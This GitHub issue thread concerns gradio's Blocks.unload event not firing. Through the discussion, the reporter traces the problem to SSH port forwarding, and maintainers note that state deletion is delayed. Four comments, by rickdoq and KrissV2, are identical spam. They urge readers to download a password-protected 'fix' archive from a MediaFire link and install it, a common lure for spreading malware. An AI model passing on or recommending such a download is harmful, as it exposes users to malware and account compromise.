### ISSUE TITLE
gr.Blocks unload event listener not working

### ISSUE THREAD

**Issue by tong-zeng** [gradio-app/gradio#9228]
### Describe the bug

According to the documentation at: https://www.gradio.app/docs/gradio/blocks#blocks-unload

The minimum example code:
```python
import gradio as gr
with gr.Blocks() as demo:
    gr.Markdown("# When you close the tab, hello will be printed to the console")
    demo.unload(lambda: print("hello"))
demo.launch()
``` 
It is not working as expected, there is nothing printed on the console.

### Have you searched existing issues?  🔎

- [X] I have searched and found no existing issues

### Reproduction

```python
import gradio as gr
with gr.Blocks() as demo:
    gr.Markdown("# When you close the tab, hello will be printed to the console")
    demo.unload(lambda: print("hello"))
demo.launch()

```

### System Info

```shell
Gradio Environment Information:
------------------------------
Operating System: Linux
gradio version: 4.42.0
gradio_client version: 1.3.0

------------------------------------------------
gradio dependencies in your environment:

aiofiles: 23.2.1
anyio: 4.4.0
fastapi: 0.112.2
ffmpy: 0.3.0
gradio-client==1.3.0 is not installed.
httpx: 0.27.2
huggingface-hub: 0.24.6
importlib-resources: 6.4.4
jinja2: 3.1.4
markupsafe: 2.1.5
matplotlib: 3.9.2
numpy: 2.1.0
orjson: 3.10.7
packaging: 24.1
pandas: 2.2.2
pillow: 10.4.0
pydantic: 2.8.2
pydub: 0.25.1
python-multipart: 0.0.9
pyyaml: 6.0.2
ruff: 0.6.2
semantic-version: 2.10.0
tomlkit==0.12.0 is not installed.
typer: 0.12.5
typing-extensions: 4.12.2
urllib3: 2.2.2
uvicorn: 0.30.6
authlib; extra == 'oauth' is not installed.
itsdangerous; extra == 'oauth' is not installed.


gradio_client dependencies in your environment:

fsspec: 2024.6.1
httpx: 0.27.2
huggingface-hub: 0.24.6
packaging: 24.1
typing-extensions: 4.12.2
websockets: 12.0
```

### Severity

Blocking usage of gradio

**Comment by tong-zeng** [comment]
I have also tried the delete_callback function of the gr.State component, it doesn't work either.

```python
import gradio as gr
with gr.Blocks() as demo:
    gr.Markdown("# When you close the tab, hello will be printed to the console")

    state = gr.State(value=[], delete_callback=lambda v: print("STATE DELETED"))
    
    demo.unload(lambda: print("hello"))
demo.launch()
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by abidlabs** [comment]
Hmm its working on my end. Can you share my about what browser / environment you are running, or could you try in a reproducible environment like Google Colab? Can you share a video recording as well please?

**Comment by freddyaboulton** [comment]
I can't repro the unload event issue either. The state deletion happens 60 minutes after disconnecting (to allow for reconnecting) but it's on my plate to make it configurable. Will file an issue for that.

**Comment by tong-zeng** [comment]
@abidlabs Thanks for your reply, it's made me re-examine my environment:
The Gradio App is running on a remote server and the local port was mapped to the remote port via SSH local port forwarding.

Since I've been using various Gradio events in the past, all of them are triggered correctly, and so far I've only found that the unload event doesn't work as expected.

I've also tested running the Gradio app locally and the unload event fires as expected.

It looks like this issue is related to SSH forwarding, thus, I am going to close this Issue, thanks again for your reply.

**Comment by tong-zeng** [comment]
@abidlabs  Thanks for your reply, it's made me re-examine my environment:
The Gradio App is running on a remote server and the local port was mapped to the remote port via SSH local port forwarding.

Since I've been using various Gradio events in the past, all of them are triggered correctly, and so far I've only found that the unload event doesn't work as expected.

I've also tested running the Gradio app locally and the unload event fires as expected.

It looks like this issue is related to SSH forwarding, thus, I am going to close this Issue, thanks again for your reply.

**Comment by Faranio** [comment]
Hello! What should we do if we have the environment described by @tong-zeng above (i.e., the Gradio App running on a remote server and then using a browser tab on a local machine)? When I close the browser tab on my local machine, the `unload()` is not being called at all. I am doing the SSH port forwarding through VSCode.
